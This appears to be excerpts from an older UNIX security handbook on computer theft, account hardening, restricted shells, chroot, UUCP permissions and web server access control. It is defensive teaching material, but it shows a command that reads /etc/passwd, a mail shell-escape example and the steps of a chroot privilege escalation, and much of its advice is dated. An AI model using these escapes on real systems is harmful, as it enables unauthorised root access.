Because many computers are relatively small and valuable, they are easily stolen and easily sold. Even computers that are relatively difficult to fence - such as DEC VaxStations - have been stolen by thieves who thought that they were actually stealing PCs. As with any expensive piece of equipment, you should attempt to protect your computer investment with physical measures such as locks and bolts.

RAM Theft

Figure 12.1: SIMMs (single inline memory modules) are vulnerable to theft

In recent years, businesses and universities have suffered a rash of RAM thefts. Thieves enter offices, open computers, and remove some or all of the computer's RAM. Many computer businesses and universities have also had major thefts of advanced processor chips.

RAM and late-model CPU chips are easily sold on the open market. They are untraceable. And, when thieves steal only some of the RAM inside a computer, many weeks or months may pass before the theft is noticed.

Remember, high-density RAM modules and processor cards are worth substantially more than their weight in gold. If a user complains that a computer is suddenly running more slowly than it did the day before, check its RAM, and then check to see that its case is physically secured.

12.2.6.1 Physically secure your computer

A variety of physical tie-down devices are available for bolting computers to tables or cabinets. Although they cannot prevent theft, they can make theft more difficult.

12.2.6.2 Encryption

If your computer is stolen, the information it contains will be at the mercy of the equipment's new "owners." They may erase it. Alternatively, they may read it. Sensitive information can be sold, used for blackmail, or used to compromise other computer systems.

You can never make something impossible to steal. But you can make stolen information virtually useless - provided that it is encrypted and that the thief does not know the encryption key. For this reason, even with the best computer-security mechanisms and physical deterrents, sensitive information should be encrypted using an encryption system that is difficult to break.[5] We recommend that you acquire and use a strong encryption system so that even if your computer is stolen, the sensitive information it contains will not be compromised.

[5] The UNIX crypt encryption program (described in Chapter 6, Cryptography) is trivial to break. Do not use it for information that is the least bit sensitive.

12.2.6.3 Portables

Portable computers present a special hazard. They are easily stolen, difficult to tie down (they would then cease to be portable!), and often quite easily resold. Personnel with laptops should be trained to be especially vigilant in protecting their computers. In particular, theft of laptops in airports is a major problem.

Note that theft of laptops may not be motivated by greed (resale potential) alone. Often, competitive intelligence is more easily obtained by stealing a laptop with critical information than by hacking into a protected network. Thus, good encryption on a portable computer is critical. Unfortunately, this encryption makes the laptop a "munition" and difficult to legally remove from many countries (including the U.S.).[6]

[6] See Chapter 6 for more detail on this.

Different countries have different laws with respect to encryption, and many of these laws are currently in flux. In the United States, you cannot legally export computers containing cryptographic software. One solution to this problem is to use an encryption product that is manufactured and marketed outside, as well as inside, your country of origin: encrypt the data before leaving, then remove the encryption software; after you arrive at your destination, obtain a copy of the same encryption software and reinstall it. (For the U.S. at least, you can legally bring the PC back into the country with the software in place.) U.S. regulations also currently have exemptions allowing U.S.-owned companies to transfer cryptographic software between their domestic and foreign offices. Furthermore, destination countries may have their own restrictions. Frankly, you may prefer to leave the portable at home!


12.2.6.4 Minimizing downtime

We hope your computer will never be stolen or damaged. But if it is, you should have a plan for immediately securing temporary computer equipment and for loading your backups onto the new systems. This plan is known as disaster recovery.

We recommend that you do the following:

● Establish a plan for rapidly acquiring new equipment in the event of theft, fire, or equipment failure.
● Test this plan by renting (or borrowing) a computer system and trying to restore your backups.

If you ask, you may discover that your computer dealer is willing to lend you a system that is faster than the original system, for the purpose of evaluation. There is probably no better way to evaluate a system than to load your backup tapes onto it and see if they work. Be sure to delete and purge the computer's disk drives before returning them to your vendor.

12.2.7 Related Concerns

Beyond the items mentioned earlier, you may also wish to consider the impact on your computer center of the following:

● Loss of phone service or networks. How will this impact your regular operations?
● A vendor going bankrupt. How important is support? Can you move to another hardware or software system?
● Significant absenteeism. Will this impact your ability to operate?
● Death or incapacitation of key personnel. Can every member of your computer organization be replaced? What are the contingency plans?




Chapter 8
8. Defending Your Accounts

Contents:
Dangerous Accounts
Monitoring File Format
Restricting Logins
Managing Dormant Accounts
Protecting the root Account
The UNIX Encrypted Password System
One-Time Passwords
Administrative Techniques for Conventional Passwords

An ounce of prevention . . .

The worst time to think about how to protect your computer and its data from intruders is after a break-in. At that point, the damage has already been done, and determining where and to what extent your system has been hurt can be difficult.

Did the intruder modify any system programs? Did the intruder create any new accounts, or change the passwords of any of your users? If you haven't prepared in advance, you could have no way of knowing the answers.

This chapter describes the ways in which an attacker can gain entry to your system through accounts that are already in place, and the ways in which you can make these accounts more difficult to attack.

8.1 Dangerous Accounts

Every account on your computer is a door to the outside, a portal through which both authorized and unauthorized users can enter. Some of the portals are well defended, while others may not be. The system administrator should search for weak points and seal them up.

8.1.1 Accounts Without Passwords

Like the lock or guard on the front door of a building, the password on each one of your computer's accounts is your system's first line of defense. An account without a password is a door without a lock. Anybody who finds that door - anybody who knows the name of the account - can enter.

Many so-called "computer crackers" succeed only because they are good at finding accounts without passwords or accounts that have passwords that are easy to guess.

On SVR4 versions of UNIX, you can scan for accounts without passwords by using the logins command:

# logins -p

You can also scan for accounts without passwords by using a command such as:

% cat /etc/passwd | awk -F: 'length($2)<1 {print $1}'
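
If you prefer to perform this check from a program rather than from the shell, the standard getpwent() library routine can walk the password database for you. The short C program below is only a minimal sketch of that approach (the file name chkpw.c and the output wording are our own); note that on systems using shadow passwords the real hashes live in a separate file such as /etc/shadow, so an empty field reported here may not tell the whole story.

/* chkpw.c - sketch: list accounts whose password field is empty.
 * Compile with: cc -o chkpw chkpw.c
 * On shadow-password systems, also examine the shadow file, since
 * getpwent() may return only a placeholder such as "x" or "*".
 */
#include <stdio.h>
#include <pwd.h>

int main(void)
{
    struct passwd *pw;

    setpwent();                         /* rewind the password database */
    while ((pw = getpwent()) != NULL)   /* walk every account entry */
        if (pw->pw_passwd == NULL || pw->pw_passwd[0] == '\0')
            printf("%s has no password\n", pw->pw_name);
    endpwent();
    return 0;
}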


demonstrations easier to run. Remember to remove these accounts when the computer is returned. (Even better: erase the hard disk and reinstall the operating system. You never know what a computer might bring back from a trade show.)

Table 8.1 is a list of accounts that are commonly attacked. If you have any of these accounts, make sure that they are protected with strong passwords or that they are set up so they can do no damage if penetrated (see the sections below entitled "Accounts That Run a Single Command" and "Open Accounts").

Table 8.1: Account Names Commonly Attacked on UNIX Systems

open      help      games
guest     demo      maint
mail      finger    uucp
bin       toor      system
who       ingres    lp
nuucp     visitor
manager   telnet

8.1.3 Accounts That Run a Single Command

UNIX allows the system administrator to create accounts that simply run a single command or application program (rather than a shell) when a user logs into them. Often these accounts do not have passwords. Examples of such accounts include date, uptime, sync, and finger, as shown below:

date::60000:100:Run the date program:/tmp:/sbin/date
uptime::60001:100:Run the uptime program:/tmp:/usr/ucb/uptime
finger::60002:100:Run the finger program:/tmp:/usr/ucb/finger
sync::60003:100:Run the sync program:/tmp:/sbin/sync

If you have these accounts installed on your computer, someone can use them to find out the time or to determine who's logged into your computer simply by typing the name of the command at the login: prompt. For example:

login: uptime
Last login: Tue Jul 31 07:43:10 on ttya
Whammix V 17.1 ready to go!
9:44am up 7 days, 13:09, 4 users, load average: 0.92, 1.34, 1.51
login:

If you decide to set up an account of this type, you should be sure that the command it runs takes no keyboard input and can in no way be coerced into giving the user an interactive process. Specifically, these programs should not have shell escapes. Letting a user run the Berkeley mail program without logging in is dangerous, because the mail program allows the user to run any command by preceding a line of the mail message with a tilde and an exclamation mark:


% mail Sarah
Subject: test message
~!date
Wed Aug 1 09:56:42 EDT 1990

Allowing programs like who and finger to be run by someone who hasn't logged in is also a security risk, because these commands let people learn the names of accounts on your computer. Such information can be used as the basis for further attacks against your computer system.

NOTE: If you must have accounts that run a single command, do not have those accounts run with the UID of 0 (root) or of any other privileged user (such as bin, system, daemon, etc.).

8.1.4 Open Accounts

Many computer centers provide accounts on which visitors can play games while they are waiting for an appointment, or allow visitors to use a modem or network connection to contact their own computer systems. Typically these accounts have names like open, guest, or play. They usually do not require passwords.

Because the names and passwords of open accounts are often widely known and easily guessed, they are security breaches waiting to happen. An intruder can use an open account to gain initial access to your machine, and then use that access to probe for greater security lapses on the inside. At the very least, an intruder who is breaking into other sites might direct calls through the guest account on your machine, making their calls difficult or even impossible to trace.

Providing open accounts on your system is a very bad idea. If you must have them, for whatever reason, generate a new, random password daily for your visitors to use. Don't allow the password to be sent via electronic mail or given to anyone who doesn't need it for that day.

8.1.4.1 Restricted shells under System V UNIX

The System V UNIX shell can be invoked to operate in a restricted mode that can be used to minimize the dangers of an open account. This mode occurs when the shell is invoked with a -r command-line option, or with the command named rsh (restricted shell)[1] - usually a link to the standard shell. When rsh starts up, it executes the commands in the file $HOME/.profile. Once the .profile is processed, the following restrictions go into effect:

[1] Not to be confused with rsh, the network remote-shell command. This conflict is unfortunate.

● The user can't change the current directory.
● The user can't change the value of the PATH environment variable.
● The user can't use command names containing slashes.
● The user can't redirect output with > or >>.

As an added security measure, if the user tries to interrupt rsh while it is processing the $HOME/.profile file, rsh immediately exits.

The net effect of these restrictions is to prevent the user from running any command that is not in a directory contained in the PATH environment variable, to prevent the user from changing his or her PATH, and to prevent the user from changing the .profile of the restricted account that sets the PATH variable in the first place.

You can further modify the .profile file to prevent the restricted account from being used over the network. You do this by having the shell script use the tty command to make sure that the user is attached to a physical terminal and not a network port.

Be aware that rsh is not a panacea. If the user is able to run another shell, such as sh or csh, the user will have the same access to your computer that he or she would have if the account were not restricted at all. Likewise, if the user can run a program that supports shell escapes, such as mail, the account is unrestricted (see below).

8.1.4.2 Restricted shells under Berkeley versions

Under Berkeley-derived UNIX, you can create a restricted shell by creating a hard link to the sh program and giving it the name rsh. When sh starts up, it looks at the program name under which it was invoked to determine what behavior it should have:

% ln /bin/sh /usr/etc/rsh

This restricted shell functions in the same manner as the System V rsh described above.

Note that a hard link will fail if the destination is on a different partition. If you need to put rsh and sh on different partitions, try a symbolic link, which works on most systems. If it does not, or if your system does not support symbolic links, then consider copying the shell to the destination partition rather than linking it.

You should be careful not to place this restricted shell in any of the standard system program directories, so that people don't accidentally execute it when they are trying to run the rsh remote shell program.

8.1.4.3 Restricted Korn shell

The Korn shell (ksh) can also be configured to operate in a restricted mode, and can be named rksh or krsh so as not to conflict with the network remote shell rsh. If ksh is invoked with the -r command-line option, or is started as rsh, it too executes in restricted mode. When in restricted mode, the Korn shell behaves like the System V restricted shell, except that the user additionally cannot modify the ENV or SHELL variables, nor can the user change the primary group using the newgrp command.

8.1.4.4 No restricted bash

The bash shell from the Free Software Foundation does not have a restricted mode.

8.1.4.5 How to set up a restricted account with rsh

To set up a restricted account that uses rsh, you must:

● Create a special directory containing only the programs that the restricted shell can run.
● Create a special user account that has the restricted shell as its login shell.

NOTE: The setup we show in the following example is not entirely safe, as we explain later in this chapter.

For example, to set up a restricted shell that lets guests play rogue and hack, and use the talk program, first create a user called player that has /bin/rsh as its shell and /usr/rshhome as its home directory:

player::100:100:The Games Guest user:/usr/rshhome:/bin/rsh

Next, create a directory for only the programs you want the guest to use, and fill the directory with the appropriate links:

# mkdir /usr/rshhome /usr/rshhome/bin
# ln /usr/games/hack /usr/rshhome/bin/hack
# ln /usr/games/rogue /usr/rshhome/bin/rogue
# ln /usr/bin/talk /usr/rshhome/bin/talk
# chmod 555 /usr/rshhome/bin
# chmod 555 /usr/rshhome

Finally, create a .profile for the player user that sets the PATH environment variable and prints some instructions:

# cat > /usr/rshhome/.profile
/bin/echo This guest account is only for the use of authorized guests.
/bin/echo You can run the following programs:
/bin/echo rogue A role playing game
/bin/echo hack A better role playing game
/bin/echo talk A program to talk with other people.
/bin/echo
/bin/echo Type "logout" to log out.
PATH=/usr/rshhome/bin
SHELL=/bin/rsh
export PATH SHELL
^D
# chmod 444 /usr/rshhome/.profile
# chown player /usr/rshhome/.profile
# chmod 500 /usr/rshhome

8.1.4.6 Potential problems with rsh

Be especially careful when you use rsh, because many UNIX commands allow shell escapes, or means of executing arbitrary commands or subshells from within themselves. Many programs that have shell escapes do not document this feature; several popular games fall into this category. If a program that can be run by a "restricted" account has the ability to run subprograms, then the account may not be restricted at all. For example, if the restricted account can use man to read reference pages, then a person using the restricted account can use man to start up an editor, then spawn a shell, and then run programs on the system.

For instance, in our above example, all of the commands linked into the restricted bin will spawn a subshell when presented with the appropriate input. Thus, although the account appears to be restricted, it will actually only slow down users who don't know about shell escapes.

8.1.5 Restricted Filesystem

Another way to restrict some users on your system is to put them into a restricted filesystem. You can construct an environment where they have limited access to commands and files, but can still have access to a regular shell (or a restricted shell if you prefer). The way to do this is with the chroot() system call. chroot() changes a process's view of the filesystem such that the apparent root directory is not the real filesystem root directory, but one of its descendants.


SVR4 has a feature to do this change automatically. If the shell field (field 7) for a user in the /etc/passwd file is a "*" symbol, then the login program will make a chroot() call on the home directory field (field 6) listed in the entry. It will then reexecute the login program - only this time, it will be the login program in the reduced filesystem, and it will be using the new passwd file found there (one that has a real shell listed, we would expect). If you do not have this feature in your version of UNIX, you can easily write a small program to do so (it will need to be SUID root for the chroot() call to function), and place the program's pathname in the shell field instead of one of the shells.
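As an illustration, here is a minimal sketch of such a SUID-root wrapper; the restricted tree /usr/restrict and the path of the login program inside it are assumptions made for the example, not values from any particular system:

/* chlogin.c - minimal sketch of a SUID-root chroot wrapper.
 * Assumes the restricted tree is /usr/restrict and that it contains
 * its own /bin/login and passwd file; adjust for your own layout. */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(void)
{
    if (chroot("/usr/restrict") < 0) {  /* requires root privileges */
        perror("chroot");
        exit(1);
    }
    if (chdir("/") < 0) {               /* don't hold the old directory open */
        perror("chdir");
        exit(1);
    }
    /* Rerun login inside the restricted tree; it will consult the
     * passwd file found there. */
    execl("/bin/login", "login", (char *)0);
    perror("execl");                    /* reached only if the exec fails */
    return 1;
}

You would compile this, make it SUID root, and list its full pathname in the shell field of the restricted user's /etc/passwd entry.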

The restricted filesystem so named must have all the necessary files and commands for the login program to run and to execute programs (including shared libraries). Thus, the reduced filesystem needs to have an /etc directory, a /lib and /usr/lib directory, and a /bin directory. However, these directories do not need to contain all of the files and programs in the standard directories. Instead, you can copy or link only those files necessary for the user.[2] Remember to avoid symbolic links reaching out of the restricted area, because the associated directories will not be visible. Using loopback mounts of the filesystem in read-only mode is one good way to populate these limited filesystems, as it also protects the files from modification. Figure 8.1 shows how the restricted filesystem is part of the regular filesystem.

[2] This may take some experimentation on your part to get the correct setup of files.

Figure 8.1: Example of restricted filesystem

There are at least two good uses for such an environment.

8.1.5.1 Limited users


You may have occasion to give access to some users for a set of limited tasks. For instance, you may have an online company directory and an order-tracking front end to a customer database, and you might like to make these available to your customer service personnel. There is no need to make all of your files and commands accessible to these users. Instead, you can set up a minimal account structure so that they can log in, use standard programs that you provide, and have the necessary access. At the same time, you have put another layer of protection between your general system and the outside: if intruders manage to break the password of one of these users and enter the accounts, they will not have access to the real /etc/passwd (to download and crack), nor will they have access to network commands to copy files in or out, nor will they be able to compile new programs to do the same.

8.1.5.2 Checking new software

Another use of a restricted environment is to test new software of perhaps questionable origin. In this case, you configure an environment for testing, and enter it with either the chroot() system command or with a program that executes chroot() on your behalf. Then, when you test the software you have obtained, or unpack an archive, or perform any other possibly risky operation, the only files you will affect are the ones you put in the restricted environment - not everything in the whole filesystem!

NOTE: Be very, very careful about creating any SUID programs that make a chroot() call. If any user can write to the directory to which the program chroot's, or if the user can specify the directory to which the chroot() occurs, the user could become a superuser on your system. To do this, he need only change the password file in the restricted environment to give himself the ability to su to root, change to the restricted environment, create a SUID root shell, and then log back in as the regular user to execute the SUID shell.

8.1.6 Group Accounts

A group account is an account that is used by more than one person. Group accounts are often created to allow a group of people to work on the same project without requiring that an account be built for each person. Other times, group accounts are created when several different people have to use the same computer for a short period of time. In many introductory computer courses, for example, there is a group account created for the course; different students store their files in different subdirectories or on floppy disks.

Group accounts are always a bad idea, because they eliminate accountability. If you discover that an account shared by 50 people has been used to break into computers across the United States, tracking down the individual responsible will be nearly impossible. Furthermore, a person is far more likely to disclose the password for a group account than he is to release the password for an account to which he alone has access. An account that is officially used by 50 people may in fact be used by 150; you have no way of knowing.

Instead of creating group accounts, create an account for each person in the group. If the individuals are all working on the same project, create a new UNIX group in the file /etc/group, and make every user who is affiliated with the project part of the group. This method has the added advantage of allowing each user to have his own start-up and dot files.

For example, to create a group called spistol with the users sid, john, and nancy in it, you might create the following entry in /etc/group:

spistol:*:201:sid,john,nancy

Then be sure that Sid, John, and Nancy understand how to set permissions and use necessary commands to work with the group account. In particular, they should set their umask to 002 or 007 while working on the group project.

NOTE: Some versions of UNIX limit the number of characters that can be specified in a single line. If you discover that you cannot place more than a certain number of users in a particular group, the above restriction might be the cause of your problem. In such a case, you may wish to place each user in the group by specifying the group in the user's /etc/passwd entry. Or, you may wish to move to a network configuration-management system, such as NIS+ or DCE, which is less likely to have such limitations.


Chapter 15
UUCP

15.4 Security in Version 2 UUCP

Version 2 of UUCP provides five files that control what type of access remote systems are allowed on your computer (see Table 15.1).

Table 15.1: UUCP Version 2 Access Control Files

File      Meaning
USERFILE  Determines access to files and directories.
L.cmds    Specifies commands that can be executed locally by remote sites.
SEQFILE   Specifies machines for which to keep conversation counts.
FWDFILE   Specifies a list of systems to which your system will forward files. (Not available in all implementations.)
ORGFILE   Specifies a list of systems (and optionally, users on those systems) who can forward files through your system. (Not available in all implementations.)

The two files of primary concern are USERFILE and L.cmds; for a detailed description of the other files, please see the book Managing UUCP and Usenet referenced above.

15.4.1 USERFILE: Providing Remote File Access

The /usr/lib/uucp/USERFILE file controls which files on your computer can be accessed through the UUCP system. Normally, you specify one entry in USERFILE for each UUCP login in the /etc/passwd file. You can also include entries in USERFILE for particular users on your computer: this allows you to give individual users additional UUCP privileges.

USERFILE entries can specify four things:

● Which directories can be accessed by remote systems

● The login name that a remote system must use to talk to the local system

● Whether a remote system must be called back by the local system to confirm its identity before communication can take place

● Which files can be sent out over UUCP by local users

15.4.1.1 USERFILE entries


USERFILE is one of the more complicated parts of Version 2 UUCP. In some cases, making a mistake with USERFILE can prevent UUCP from working at all. In other cases, it can result in a security hole.

Entries in USERFILE take the form:

username,system-name [c] pathname(s)

An entry in USERFILE that uses all four fields might look like this:

Ugarp,garp c /usr/spool/uucppublic

These fields are described in Table 15.2.

Table 15.2: USERFILE Fields

username (example: Ugarp)
Login name in /etc/passwd that will be used.

system name (example: garp)
System name of the remote system.

c (example: c)
Optional callback flag. If present, uucico on the local computer halts conversation after the remote machine calls the local machine; uucico on the local machine then calls back the remote machine to establish the remote machine's identity.

pathname (example: /usr/spool/uucppublic)
List of absolute pathname prefixes separated by blanks. The remote system can access only those files beginning with these pathnames. A blank field indicates open access to any file in the system, as does a pathname of /.

You should have at least one entry in USERFILE without a username field, and at least one other entry without a system name field:

● The line that has no username field is used by uucico when it is transmitting files, to determine if it is allowed to transmit the file that you have asked to transmit.

● The line that has no system name field is used by uucico when it is receiving files and cannot find a name in the USERFILE that has a system name matching the current system. uucico uses this line to see if it is allowed to place a file in the requested directory. This line is also used by the uuxqt program.

To make things more interesting, almost every implementation of UUCP parses USERFILE a little differently. The key rules that apply to all versions are:

● When uucp and uux are run by users, and when uucico runs in the Master role (a connection originating from your local machine), UUCP uses only the username part of the username and system name fields.

● When uucico runs in the Slave role, UUCP looks only at the system name field.

● There must be at least one line that has an empty system name, and one line that has an empty username. (In most BSD-derived systems, they can be the same line. Every other implementation requires two separate lines. You are safest in using two lines if you don't understand what your version allows.) The locations of these lines in the file are not important, but both lines must be present.

15.4.1.2 USERFILE entries for local users

You can have an entry in your USERFILE for every user who will be allowed to transfer files. For example, the following entries give the local users lance and annalisa permission to transfer a file in or out of any directory on your computer to which they have access:

lance, /
annalisa, /

This USERFILE entry gives the local user casper permission to transfer files in or out of the UUCP public directory or the directory /usr/ghost:

casper, /usr/spool/uucppublic /usr/ghost

Be aware that USERFILE allows a maximum of 20 entries in Version 7 and System V Release 1.0.

Instead of specifying a USERFILE entry for each user on your system, you can specify a USERFILE entry without a username. This default entry covers all users on your system that are not otherwise specified. To give all users access to the UUCP public directory, you might use the following USERFILE entry:

,localhost /usr/spool/uucppublic

(The hostname localhost is ignored by the UUCP software and is included only for clarity.)

15.4.1.3 Format of USERFILE entry without system name

To allow file transfer from other systems to your system, and to allow files to be accessed by uuxqt (even when it is started from your system), you must have at least one entry in USERFILE for which the system name is not specified. For example:

nuucp, /usr/spool/uucppublic

Although you might expect that this line would mean that any system logging in with the name nuucp would have access to /usr/spool/uucppublic, such is not the case for all versions of UUCP.

In System V Release 2.0 and in Ultrix, UUCP will actually check both the username field and the blank system name field, and will allow logins by any system using nuucp.

In other UUCP implementations, however, the fact that nuucp appears on this line is completely irrelevant to a system calling in. The system name is used only to validate file transfers for files that are received by your system. If this is the first entry with a missing system name, UUCP will actually allow access to uucppublic by any system for which there is no explicit USERFILE entry containing that system's system name. If this is not the first entry with a blank system name, it will have no effect.

15.4.1.4 Special permissions

You may wish to make special directories on your system available to particular users on your system or to particular systems with which you communicate. For example:

Ugarp,garp /usr/spool/uucppublic /usr/spool/news

This line will make both the directories /usr/spool/uucppublic and /usr/spool/news available to the system named garp when you call it, and to any system that logs in with the UUCP login Ugarp. You might want to add this line if you anticipate transferring news articles between your computer and garp directly, without going through the Usenet news software.

15.4.1.5 Requiring callback

Version 2 UUCP has a callback feature that you can use if you are extremely concerned about security. With callback, when a remote system calls your computer, your system immediately hangs up on the remote system and calls it back. In this way, you can be sure that the remote system is who it claims to be.

If you put a c as the first entry in the USERFILE path list, no files will be transferred when the remote system's uucico logs in. Instead, your system will call back the remote system. No special callback hardware is required to take advantage of UUCP callback, because it is performed by the system software, not by the modem.

For example, here is garp's USERFILE entry modified so the local system will always call garp back whenever garp calls the local system:

Ugarp,garp c /usr/spool/uucppublic /usr/spool/news

Callback adds to the security of UUCP. Normally there is no way to be sure that a computer calling up and claiming to be garp, for example, is really garp. It might be another system that belongs to a computer cracker who has learned garp's UUCP login and password. If you call back the remote system, however, you can be reasonably sure that you are connecting to the right system.

NOTE: Only one system out of each pair of communicating systems can have a c in its USERFILE to enable the callback feature. If both ends of a connection enable callback, they will loop endlessly - calling each other, hanging up, and calling back. For more information, see the comments on callback in Chapter 14, Telephone Security.

15.4.2 A USERFILE Example

Here is a sample USERFILE:

, /usr/spool/uucppublic
# Next line not needed in BSD 4.2 or 4.3
nuucp, /usr/spool/uucppublic
dan, /usr/spool/uucppublic /u1/dan
csd, /usr/spool/uucppublic /u1/csd
root, /
udecwrl,decwrl /usr/spool/uucppublic /usr/spool/news
upyrnj,pyrnj /usr/spool/uucppublic /usr/src

As noted earlier, in some systems the first line defines both the missing username and the missing system name and gives access to the directory /usr/spool/uucppublic. In other implementations of UNIX, two separate lines are required: the first line will suffice for the missing username, and another line, such as the second one shown here (the line beginning with nuucp), will account for the missing system name. The effect of these lines is to allow any local user, and any remote machine, to transfer files only from the public directory.

If you don't have any particularly trusted sites or users, you may want to stop at this point. However, if you want to give special privileges to particular local users, you'll include lines such as the next three (the lines beginning with dan, csd, and root). Users dan and csd can transfer files to or from their home directories as well as from the public directory. Users logged in as root can transfer files to or from any directory. (This structure makes sense, as they can do anything else, including modifying USERFILE to suit their needs or whims.)

Finally, you may need to specify particular permissions for known local systems. In the example, decwrl is able to transfer files to /usr/spool/news as well as to the public directory. The site pyrnj is able to transfer files to and from /usr/src as well as to and from the public directory.

15.4.2.1 Some bad examples

If you are not very concerned about security, the following USERFILE might suffice:

# A wide open USERFILE
nuucp, /usr/spool/uucppublic
, /

However, we recommend against it! This USERFILE will allow remote systems (assuming that they all log in as nuucp) to transfer files to or from the public directory, but will give complete UUCP access to local users. This is dangerous and is not recommended, as it allows local users access to any protected file and directory that is owned by uucp.

If you don't talk to the outside world and are using UUCP only for communication with UNIX sites inside your organization, you might use the following USERFILE:

# A completely open USERFILE
, /
, /

This USERFILE will allow any user on your system, or any remote system, to transfer files to or from any directory. This example is even more dangerous than the previous one. (Note that on many systems, two lines are necessary, even though they are identical. The first line defines the missing username, and the other line defines the missing system name. In some systems, a single line will suffice, but you will never be wrong if you include both of them.)

Remember that even with complete access specified in USERFILE, UUCP is still subject to UNIX file permissions. A user requesting outbound transfer of a file must have read access to it. For a remote system to have access to a file or directory, the file or directory must be readable and writable by all users, or by UUCP.

NOTE: If you wish to run a secure system, the directory /usr/lib/uucp (or /etc/uucp) must not be in the permission list! If users from the outside are allowed to transfer into these directories, they can change the USERFILE or the L.cmds files to allow them to execute any command that they wish. Local users can similarly use the uucp command to change these files, and subvert UUCP. Giving all access from the / directory is also dangerous - such access makes it possible for people outside your organization to subvert your system easily, as they can then modify any directory on your system that is world writable.

For example, granting access to / lets an outsider read the contents of your /etc/passwd file, and also allows him to read and change the contents of your /usr/lib/uucp/L.sys file. As an added precaution, the home directory for the uucp user should not be in /usr/spool/uucp/uucppublic, or any other directory that can be written to by a uucp user. Doing so may allow an outside user to subvert your system.

15.4.3 L.cmds: Providing Remote Command Execution

You will probably want to limit the commands that can be executed by a remote system via uucp. After all, if any command could be executed by UUCP, then people on other computers could use the /bin/rm command to delete files in any writable directory on your computer! [7]

[7] This gives a new definition to the phrase "world writable."

For this reason, UUCP allows you to specify which commands remote systems are allowed to execute on your computer. The list of valid commands is contained in the directory /usr/lib/uucp in the file L.cmds, L-cmds, or uuxqtcmds (different versions store the command list in different files). Some early UNIX systems (Version 7 or earlier) may not have this file at all (and have no way of changing the defaults without modifying the source code to the uuxqt program.) For further information, check your own system's documentation.

In some versions of UUCP, the L.cmds file can also include a PATH= statement that specifies which directories uuxqt should check when searching for the command to execute.

A typical L.cmds file might contain the following list of commands:

PATH=/bin:/usr/bin:/usr/ucb
rmail
rnews
lpr
who
finger

If a command is not in the commands file, uux cannot execute it. L.cmds should at least contain the rmail program (the remote mail program that decides whether mail is to be delivered locally or forwarded on to yet another system). If rmail is not listed in L.cmds, a local user will not be able to receive mail from remote users via UUCP.

Add commands to this file carefully; commands like cat or rm may place your system at risk. You should be careful about commands that allow shell escapes (such as man). Even finger can be dangerous if you are very concerned about security, because it might provide a cracker with a list of usernames to try when guessing passwords.


Look carefully at the L.cmds file that comes with your system: you may wish to remove some of the commands that it includes. For example, some BSD-derived systems include the ruusend command in this file, which allows file forwarding. This command is a security hole, because a remote system could ask your system to forward protected files that are owned by the uucp user, such as the file L.sys.

If the L.cmds file does not exist, UUCP will use a default set of commands. If the file exists but is empty, remote commands cannot be executed on your system. In this event, the UUCP system can be used only for transferring files.


Chapter 18
WWW Security

18.3 Controlling Access to Files on Your Server

Many sites are interested in limiting the scope of the information that they distribute with their Web servers. This may be because a Web server is used by an organization to distribute both internal data, such as employee handbooks or phone books, and external data, such as how to reach the organization's headquarters by mass transit. To provide for this requirement, many Web servers have a system for restricting access to Web documents.

The WN Server

Most of this chapter discusses the NCSA and CERN servers, which are two of the most popular servers in use on the Internet at this time. A server that appears to offer considerably more security than these servers is the WN server, developed by John Franks.

The WN server is a Web server designed from the ground up to provide security and flexibility. The server can perform many functions, such as banners, footers, and searching, and the selective retrieval of portions of documents, which can only be performed on other servers using CGI scripts. The server is also smaller than the NCSA and CERN servers, making it easier to validate.

Another feature of the WN server is that it will not transfer any file in any directory unless that file is listed in a special index file, normally called index.cache. The index file also contains the MIME file type of each file in the directory; thus, WN eliminates the need to give your Web files extensions, such as filename.html or picture.jpeg. Automated tools are provided for creating these files, if you choose to use them.

We do not have significant experience with the WN server, but its design looks promising. For more information, check http://hopf.math.nwu.edu/docs/manual.html.

Most servers support two primary techniques for controlling access to files and directories:

1. Restricting access to particular IP addresses, subnets, or DNS domains.

2. Restricting access to particular users. Users are authenticated through the use of a password that is stored on the server.

Servers that are equipped with the necessary software for public key cryptography (usually, servers that are purchased for commercial purposes) have a third technique for restricting access:

3. Restricting access to users who present public keys that are signed by an appropriate certification authority.


Each of these techniques has advantages and disadvantages. Restricting to IP address is relatively simple within an organization, although it leaves you open to attacks based on "IP spoofing." Using hostnames, instead of IP addresses, further opens your server to the risk of DNS spoofing. And usernames and passwords, unless you use a server and clients that support encryption, are sent in the clear over the network.

Of these three techniques, restricting access to people who present properly signed certificates is probably the most secure, provided that you trust your certification authority. (See below.)

18.3.1 The access.conf and .htaccess Files

The NCSA server allows you to place all of your global access restrictions in a single file called conf/access.conf. Alternatively, you can place the restrictions in each directory using the name specified by the AccessFileName in the configuration file conf/srm.conf. The per-directory default file name is .htaccess, but you can change this name if you wish.

Whether you choose to use many access files or a single file is up to you. It is certainly more convenient to have a file in each directory. It also makes it easier to move directories within your Web server, as you do not need to update the master access control file. Furthermore, you do not need to restart your server whenever you make a change to the access control list - the server will notice that there is a new .htaccess file, and behave appropriately.

On the other hand, having an access file in each directory means that there are more files that you need to check to see whether the directories are protected or not. There is also a bug with some Web servers that allows the access file to be directly fetched (see the Note below). As a result, most Web professionals recommend against per-directory access control files.

The contents of the access.conf file look like HTML. Accesses for each directory are bracketed with two tags, <Directory directoryname> and </Directory>. For example:

<Directory /usr/local/etc/httpd/htdocs>
<Limit GET>
order deny,allow
deny from all
allow from .nsa.mil
</Limit>
</Directory>

If you are using the per-directory access control, do not include the <Directory> and </Directory> tags. For example:

<Limit GET>
order deny,allow
deny from all
allow from .nsa.mil
</Limit>

NOTE: There is a bug in many Web servers (including the NCSA server) that allows the .htaccess file to be fetched as a URL. This is bad, because it lets an attacker learn the details of your authentication system. For this reason, if you do use per-directory access control files, give them a name other than .htaccess by specifying a different AccessFileName in the srm.conf file, as shown below:

# AccessFileName: The name of the file to look for in each directory
# for access control information.
AccessFileName .ap

18.3.2 Commands Within the <Directory> Block

As the above examples illustrate, a number of commands are allowed within the <Directory> blocks. The commands that are useful for restricting access[2] are:

[2] Other commands that can be inserted within a <Directory> block can be found in NCSA's online documentation at http://hoohoo.ncsa.uiuc.edu/docs/setup/access/Overview.html.

Options opt1 opt2 opt3

Use the Options command for turning on or off individual options within a particular directory. Options available are FollowSymLinks (follows symbolic links), SymLinksIfOwnerMatch (follows symbolic links if the owner of the link's target is the same as the owner of the link), ExecCGI (turns on execution of CGI scripts), Includes (turns on server-side includes), Index (allows the server to respond to requests to generate a file list for the directory), and IncludesNoExec (enables server-side includes, but disables CGI scripts in the includes).

AllowOverride what

Specifies which directives can be overridden with directory-based access files.

